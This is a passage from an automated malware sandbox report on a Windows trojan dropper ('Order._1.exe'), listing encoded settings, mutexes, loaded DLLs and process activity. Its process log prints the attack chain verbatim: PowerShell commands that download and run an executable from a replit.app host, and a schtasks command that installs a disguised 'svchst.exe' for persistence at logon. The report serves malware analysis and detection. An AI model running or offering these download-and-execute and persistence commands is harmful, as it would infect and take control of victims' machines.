'stBMPaCseohw48pQ5j+jieFCpmrBd4rTK1Zvk5A+hcR1EjzVv6UNardciPj5rKcyUb4/Mg+M3Zi+FV09AhSveRMXl0FOwWjKaEbhnFIT60XI6/gG1KTQMr6yZ1QtG4LVe9V3TmczZj7fWN+E6l+Vyc6YdxDOywsTEKqOsPFoPp04HwNes7st3tf4xVlDXrn88XewCZ7LY09n4ht/GObRXgJeK2tKqck6gcn5I/kCw4pZDW4jPQ1XrPwGa4Hi+MIsfi4OrxsPF90qH/QX26+iPizLYAZD0YJDHeaqCxM9yDyMs4/PD+mL6TB3MSgDu5KLuKma+ekkz3HT+bDoa+9UxerSHCSaV6YLOqownJbP+IFURi0CH45wsA/v5fuG44/MeD7F7hwHYHUbVCX1jLUjoumXH4p02ldEL7/A0IF64dCUlm6wXbqAy4m15mg2BYIRfAYKhJlNVaf/MQ/mQW7iPIJGnDtJLFZVDnX6scsLLX2hQXD9AXZuAyF2dws8BkWtTch+YPBkrsaR+OwJzmEGk4FrSMWIZJHAJak4BwGtnwBEzgHeI5R2jQCBhqcF1+ezuNmNmyMiStDD6XW0BOctfbXLo9yQaTIEP74LpzZVZt5gbgoneu7zykSzNrwfSG3NBaoxBAdM1z3UTEBAxaHXHat0wxfL3yqfrjlAWPMfWG0XUOS00xpJPHDhRZYoXa+mH8lUe9FMqFNZzWkwN9ERt5RnBVyoz8Z0d+8Vc0uZoaZ5xdX94ColF0MlIubPRCuvDcAjh6aHb6XzdsYzd8nGgxcOjkdJ0HC/4sN8N9ewcyMeZ4UYXy/8WpbNdYvYPjBMmw73KrtqNmMgXx/Q+W51pkOJnsBCzkqB/JsoTLIO8kkVNXa5h8yc1gCgG/0O6nyMI7pWHxzAkux1tDFNAawVscfIWlj5unqAcGS2XP/yWiGOdJGMxd+A37mJ+kfuQDOzZvnNr8PG3gOGA7EqovErZg==', 'XlJmXPQTjwboANulS9LnwIILBKq/C35BTm8KIAMb8foem7G2GugOGhd3LaKvT4x0FLgzAdHtYEmqWyNHyTJscQ==', 'xgc/DrNayvH+qStYwh5PdHcrFAKMePynDoZI0y1/d9HprMWNE7Dp3Al5+nwN5tcxMmJ1Ywomr6dq+A5l4AZ+NQ==', 'Y7t3wwf932TvdvOqbSa66BoOxuApNMvFkfUnK6B9qryvqz1qRD0TujKRdcA4lL57EUeB63fXrGQvXvnWj2qJFg=='
              Source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, Settings.csBase64 encoded string: 'IktYzmeBL3sqI7MbtNwmDlY5Hl5jYuvJ6mqLO5ieg6NR8Rm+Fy2K+UtvY40FJGkFur3tuDEDyY0+2irPMkSsEw==', '/e7N2vcKvkG3uYcb8CLGT7IIcNcNSPNJ854BEG6vRMABRw8TChoVkkF2Yyfa7LaG6pcKLwM4HgnDKwJLD6SdHA==', 'SZ+2mntHgU68CKySNnoNSxuhMBM+7c9KvnWVLuPmt5rHmg9RHTHW8BWoBZuUwkuCyx7Z7KWRwzzcRZ3j1Ek83g==', 'YSiYPcZO8xl1HAUFya3+djvQEXRnwtYCf/DfWtqbNQfNn1ZHqPs9XTOuv533RHNW/hXHUjXtKzr3+9VEenQj+g==', 'NL7ihy/ayhSShDQiRtDG9DQ+MkG4pr72KW4bDzBnZZh/RiVUPqaP9g/f7c52xyVqYdIar4xNoZOTAuCmUoaRu5pHSJyuafxpl49Cj15inc8=', 'stBMPaCseohw48pQ5j+jieFCpmrBd4rTK1Zvk5A+hcR1EjzVv6UNardciPj5rKcyUb4/Mg+M3Zi+FV09AhSveRMXl0FOwWjKaEbhnFIT60XI6/gG1KTQMr6yZ1QtG4LVe9V3TmczZj7fWN+E6l+Vyc6YdxDOywsTEKqOsPFoPp04HwNes7st3tf4xVlDXrn88XewCZ7LY09n4ht/GObRXgJeK2tKqck6gcn5I/kCw4pZDW4jPQ1XrPwGa4Hi+MIsfi4OrxsPF90qH/QX26+iPizLYAZD0YJDHeaqCxM9yDyMs4/PD+mL6TB3MSgDu5KLuKma+ekkz3HT+bDoa+9UxerSHCSaV6YLOqownJbP+IFURi0CH45wsA/v5fuG44/MeD7F7hwHYHUbVCX1jLUjoumXH4p02ldEL7/A0IF64dCUlm6wXbqAy4m15mg2BYIRfAYKhJlNVaf/MQ/mQW7iPIJGnDtJLFZVDnX6scsLLX2hQXD9AXZuAyF2dws8BkWtTch+YPBkrsaR+OwJzmEGk4FrSMWIZJHAJak4BwGtnwBEzgHeI5R2jQCBhqcF1+ezuNmNmyMiStDD6XW0BOctfbXLo9yQaTIEP74LpzZVZt5gbgoneu7zykSzNrwfSG3NBaoxBAdM1z3UTEBAxaHXHat0wxfL3yqfrjlAWPMfWG0XUOS00xpJPHDhRZYoXa+mH8lUe9FMqFNZzWkwN9ERt5RnBVyoz8Z0d+8Vc0uZoaZ5xdX94ColF0MlIubPRCuvDcAjh6aHb6XzdsYzd8nGgxcOjkdJ0HC/4sN8N9ewcyMeZ4UYXy/8WpbNdYvYPjBMmw73KrtqNmMgXx/Q+W51pkOJnsBCzkqB/JsoTLIO8kkVNXa5h8yc1gCgG/0O6nyMI7pWHxzAkux1tDFNAawVscfIWlj5unqAcGS2XP/yWiGOdJGMxd+A37mJ+kfuQDOzZvnNr8PG3gOGA7EqovErZg==', 'XlJmXPQTjwboANulS9LnwIILBKq/C35BTm8KIAMb8foem7G2GugOGhd3LaKvT4x0FLgzAdHtYEmqWyNHyTJscQ==', 'xgc/DrNayvH+qStYwh5PdHcrFAKMePynDoZI0y1/d9HprMWNE7Dp3Al5+nwN5tcxMmJ1Ywomr6dq+A5l4AZ+NQ==', 'Y7t3wwf932TvdvOqbSa66BoOxuApNMvFkfUnK6B9qryvqz1qRD0TujKRdcA4lL57EUeB63fXrGQvXvnWj2qJFg=='
              Source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winEXE@26/18@2/3
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_004026B8 LoadResource,SizeofResource,FreeResource,0_2_004026B8
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeFile created: C:\Users\user\AppData\Roaming\windowscachergslog.binJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\svchst.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\svchst.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
              Source: C:\Users\user\Desktop\Order._1.exeFile created: C:\Users\user\AppData\Local\Temp\6318.tmpJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.bat C:\Users\user\Desktop\Order._1.exe"
              Source: C:\Users\user\Desktop\Order._1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Order._1.exeVirustotal: Detection: 66%
              Source: Order._1.exeReversingLabs: Detection: 63%
              Source: unknownProcess created: C:\Users\user\Desktop\Order._1.exe "C:\Users\user\Desktop\Order._1.exe"
              Source: C:\Users\user\Desktop\Order._1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.bat C:\Users\user\Desktop\Order._1.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe CoinAIfdp.exe
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp87D1.tmp.bat""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchst.exe C:\Users\user\AppData\Roaming\svchst.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchst.exe "C:\Users\user\AppData\Roaming\svchst.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe "C:\Users\user~1\AppData\Local\Temp\CoinAIfdp.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchst.exe "C:\Users\user\AppData\Roaming\svchst.exe"
              Source: C:\Users\user\Desktop\Order._1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.bat C:\Users\user\Desktop\Order._1.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe CoinAIfdp.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exitJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp87D1.tmp.bat""Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchst.exe "C:\Users\user\AppData\Roaming\svchst.exe" Jump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: iertutil.dllJump to behavior
